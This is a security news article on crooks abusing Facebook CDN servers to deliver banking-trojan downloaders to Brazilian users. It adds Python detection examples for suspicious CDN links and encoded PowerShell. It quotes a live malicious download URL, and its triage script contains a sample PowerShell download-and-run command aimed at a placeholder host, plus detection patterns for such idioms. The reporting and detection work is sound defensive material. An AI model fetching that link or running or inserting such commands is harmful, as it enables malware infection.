
Crooks leverage Facebook CDN servers to bypass security solutions

Crooks are abusing Facebook CDN servers to deliver malware, evading detection by exploiting the trust that security products place in the social networking giant's CDN.

Crooks are abusing Facebook CDN (Content Delivery Network) servers to store malware and deliver it to victims. Because the files are served from the social network giant's own infrastructure, the downloads pass through security controls that trust the CDN domain.

Researchers from the MalwareHunter team uncovered several campaigns leveraging Facebook CDN servers in the last two weeks. In the past, the same malware group used Dropbox and Google's cloud storage services to host the same payloads.

In July, researchers at Palo Alto Networks published a detailed report on an ongoing malspam campaign targeting Brazil; in that case the crooks used legitimate services such as Google and Dropbox to deliver the malware.

Back to the present: hosting the payload on the Facebook CDN allows the cybercriminals to bypass security solutions, because the domain is trusted by them and the related traffic is not blocked. Allow-listing an entire CDN domain means that any file a user can upload to a public Facebook group becomes reachable through a URL those products will not inspect.

The cybercriminals send spoofed emails that pose as official communications from local authorities. The messages include a link that leads to the Facebook CDN; the URL points to a file the gang uploaded to a Facebook group or another public section of the site.

Below is one of the links used by the gang. Note the lure filename in the last path segment, which mimics a Brazilian electronic invoice document (DANFE):

https://cdn.fbsbx.com/v/t59.2708-21/20952350_119595195431306_4546532236425428992_n.rar/NF-DANFE_FICAL-N-5639000.rar?oh=9bb40a7aaf566c6d72fff781d027e11c&oe=59AABE4D&dl=1

[Image: the related spam message]
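The link above has the structure of a Facebook CDN file download, and the campaign's tell is visible in the URL itself: a user-chosen display filename with an archive extension in the last path segment, and `dl=1`, which forces a download rather than inline rendering. The `oe` parameter is widely understood to be a hex-encoded Unix expiry time; that interpretation, and the list of CDN hostnames, are assumptions of this example. The following Python is an added example (not code from the original post, from MalwareHunter or from BleepingComputer) that applies this as a mail-gateway or proxy-log rule to the URL quoted above and to two constructed benign URLs.

```python
import re
from datetime import datetime, timezone
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample set. SAMPLE_URLS[0] is the link quoted in the article;
# the other two are made up here so the rule can be shown not to fire on them.
SAMPLE_URLS = [
    "https://cdn.fbsbx.com/v/t59.2708-21/20952350_119595195431306_4546532236425428992_n.rar"
    "/NF-DANFE_FICAL-N-5639000.rar?oh=9bb40a7aaf566c6d72fff781d027e11c&oe=59AABE4D&dl=1",
    # constructed: a document viewed inline, no forced download
    "https://cdn.fbsbx.com/v/t59.2708-21/11111111_222222222222222_3333333333333333333_n.pdf"
    "/report.pdf?oh=00&oe=59AABE4D",
    # constructed: not a Facebook host at all
    "https://scontent.example.invalid/photo.jpg",
]

# Assumption: Facebook user-content and static-content CDN hostnames.
FB_CDN_HOST = "cdn.fbsbx.com"
FB_CDN_SUFFIX = ".fbcdn.net"

# Container formats this crew used (RAR/ZIP per the article) plus common lookalikes.
ARCHIVE_EXT = {".rar", ".zip", ".7z", ".ace", ".arj", ".cab", ".iso"}


def _ext(name):
    m = re.search(r"\.[a-z0-9]{1,4}$", name.lower())
    return m.group(0) if m else ""


def analyse_fb_cdn_url(url):
    """Classify one URL: is it a Facebook CDN file link, and does it look like a
    forced download of an archive (the pattern this campaign relies on)?"""
    u = urlparse(url)
    host = (u.hostname or "").lower()
    result = {"fb_cdn": False, "suspicious": False, "reasons": [],
              "display_name": None, "expires_utc": None}
    if host != FB_CDN_HOST and not host.endswith(FB_CDN_SUFFIX):
        return result
    result["fb_cdn"] = True

    # The last path segment is the uploader-chosen display filename; the segment
    # before it is the stored object name assigned by the CDN.
    segments = [unquote(s) for s in u.path.split("/") if s]
    display = segments[-1] if segments else ""
    result["display_name"] = display
    query = parse_qs(u.query)

    is_archive = _ext(display) in ARCHIVE_EXT
    forced_download = query.get("dl") == ["1"]
    if is_archive:
        result["reasons"].append("archive file: " + display)
    if forced_download:
        result["reasons"].append("dl=1 forces a download instead of inline rendering")

    # Assumption: 'oe' is a hex Unix timestamp after which the signed link stops working.
    if "oe" in query:
        try:
            ts = int(query["oe"][0], 16)
            result["expires_utc"] = datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()
        except ValueError:
            pass

    # Both conditions together: a trusted CDN host pushing an archive to disk.
    result["suspicious"] = is_archive and forced_download
    return result


def scan(urls):
    """Run the rule over a batch of URLs (e.g. extracted from mail bodies or proxy logs)."""
    return [analyse_fb_cdn_url(u) for u in urls]


if __name__ == "__main__":
    for verdict in scan(SAMPLE_URLS):
        print(verdict)
```

Blocking `cdn.fbsbx.com` outright breaks legitimate Facebook attachments, so the useful response is to quarantine or detonate archive downloads that match both conditions rather than the whole domain. The decoded expiry also shows why these links are short-lived indicators: under the assumption above, the quoted link stopped working on 2 September 2017 at 14:21 UTC, which is consistent with the 2 September campaign mentioned later in the article.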

Once the victim clicks on the link, an RAR or ZIP file is downloaded that contains a link (shortcut) file. The shortcut invokes a legitimate application installed on most Windows PCs (such as the Command Prompt or PowerShell) to run an encoded PowerShell script. The original write-up labels this technique Squiblydoo; strictly, that name refers to regsvr32.exe executing a remote scriptlet through scrobj.dll, but the common thread is abusing a signed, trusted Windows binary to launch attacker-controlled script, so the first stage carries no malicious executable of its own. Experts observed APT32 using Squiblydoo while targeting Vietnamese interests around the globe.

The encoded PowerShell script downloads and runs a second PowerShell script that carries out a large number of operations.

“The second PowerShell script downloads a loader DLL file, which in turn downloads a legitimate EXE file and a second DLL.” wrote Catalin Cimpanu from BleepingComputer.

“The twisted maze of operations continues with the creation of another link (shortcut) file that points to a VBS script. The PowerShell script then invokes the shortcut file, which in turn invokes the VBS script, which in turn executes the legitimate EXE file, which in turn side-loads the second DLL file.”
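The first stage of the chain described above, a shortcut launching powershell.exe with an encoded command, is what a SOC analyst usually sees first, as a process-creation event. The Python below is an added example, not code from the original post, from BleepingComputer or from the campaign itself: it builds a constructed process-creation record (the encoded script, the hostname example.invalid and the field names are mine, loosely shaped like a Sysmon event), decodes the base64/UTF-16LE payload the way powershell.exe does, and scores it for download-and-execute idioms and for being launched from cmd.exe or explorer.exe, which is where a shortcut opened out of an archive runs from.

```python
import base64
import ntpath
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|enco|encod|encode|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)"
)

# Idioms typical of a first-stage downloader, checked against the raw and decoded text.
INDICATORS = {
    "invoke-expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "web-download": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"),
    "hidden-window": re.compile(r"(?i)[-/]w(?:indowstyle)?\s+hidden"),
    "no-profile": re.compile(r"(?i)[-/]nop(?:rofile)?\b"),
}

# Parents under which an encoded PowerShell launch is worth a second look: a shortcut
# opened from an archive runs under explorer.exe, and this crew's LNK goes via cmd.exe.
SHELL_PARENTS = {"explorer.exe", "cmd.exe"}


def encode_ps(script):
    """Produce the -EncodedCommand form powershell.exe expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(b64):
    """Reverse of encode_ps; raises on malformed input."""
    return base64.b64decode(b64).decode("utf-16-le")


# Constructed stage-1 script and event. The host example.invalid is a placeholder.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_EVENT = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "ParentImage": r"C:\Windows\System32\cmd.exe",
    "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(STAGE1),
}


def triage_cmdline(command_line, parent_image=""):
    """Decode an encoded PowerShell command line and score it.

    Returns a dict with the decoded script (if any), the indicators hit and a
    verdict: 'benign', 'review' (encoded but no downloader idioms) or 'suspicious'."""
    result = {"encoded": False, "decoded": None, "indicators": [], "verdict": "benign"}
    text = command_line
    m = ENC_FLAG.search(command_line)
    if m:
        result["encoded"] = True
        try:
            result["decoded"] = decode_ps(m.group(1))
            text = command_line + " " + result["decoded"]
        except (ValueError, UnicodeDecodeError):
            result["indicators"].append("undecodable-encodedcommand")

    for name, rx in INDICATORS.items():
        if rx.search(text):
            result["indicators"].append(name)

    if result["encoded"] and ntpath.basename(parent_image).lower() in SHELL_PARENTS:
        result["indicators"].append("encoded-launch-from-shell")

    hits = set(result["indicators"])
    if result["encoded"] and hits & {"invoke-expression", "web-download"}:
        result["verdict"] = "suspicious"
    elif result["encoded"]:
        result["verdict"] = "review"
    return result


if __name__ == "__main__":
    print(triage_cmdline(SAMPLE_EVENT["CommandLine"], SAMPLE_EVENT["ParentImage"]))
```

Decoding is the step that matters: the base64 blob defeats naive keyword matching on the command line, and the UTF-16LE encoding means a plain base64 decode followed by an ASCII read yields interleaved null bytes rather than readable script. The process-ancestry check is what ties the event back to the delivery method in this campaign; on its own, an encoded command is common enough in administration scripts to warrant only a review queue.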

The crooks target only users in Brazil: when the victim is located in another country, the attack chain is cut short by serving an empty last-stage DLL file.

The campaign delivers the Banload malware downloader, which in turn serves the Win32/Spy.Banker.ADYV banking trojan, a threat that targets Brazilian users only.

Experts believe the threat actor is the same one behind the Banload campaign that targeted Brazil in 2016 and the one that spread the Escelar banking Trojan in 2015.

Experts from MalwareHunter believe the malware group is very sophisticated and well-resourced.

“A campaign MalwareHunter spotted on September 2 pushed out emails that were viewed by at least 200,000 Brazilian users. Two other campaigns also garnered between 70,000-80,000 views each.” BleepingComputer continues.


Pierluigi Paganini

(Security Affairs – Facebook CDN server, malware)
